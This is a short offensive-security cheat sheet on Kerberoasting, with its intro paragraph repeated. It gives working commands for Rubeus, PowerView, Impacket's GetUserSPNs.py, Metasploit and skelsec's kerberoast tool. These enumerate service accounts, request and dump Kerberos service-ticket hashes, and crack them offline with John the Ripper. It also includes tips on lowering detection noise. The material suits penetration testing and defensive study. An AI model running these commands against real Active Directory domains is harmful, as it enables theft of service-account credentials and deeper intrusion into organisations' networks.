Kerberoast
Compromise a domain user, then request a TGS for a service account. The TGS is encrypted with the hashed version of that account's password, which allows offline cracking of service account passwords.
Compromise a domain user, then request a TGS for a service account. The TGS is encrypted with the hashed version of that account's password, which allows offline cracking of service account passwords.
# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# PowerView
Get-DomainUser -SPN
# Rubeus
.\Rubeus.exe kerberoast /stats
### Linux
# Metasploit framework
msf> use auxiliary/gather/get_user_spns
# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # The password is prompted for interactively (not passed on the command line)
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users (writes kerberoastable_spn_users.txt)
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
Rubeus.exe kerberoast /user:svcadmin /simple
# Lower-noise option: only request tickets for SPNs that support RC4
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
# Kerberoast all possible accounts (bad OPSEC: very noisy)
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
# Crack the dumped hashes offline with John the Ripper
john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt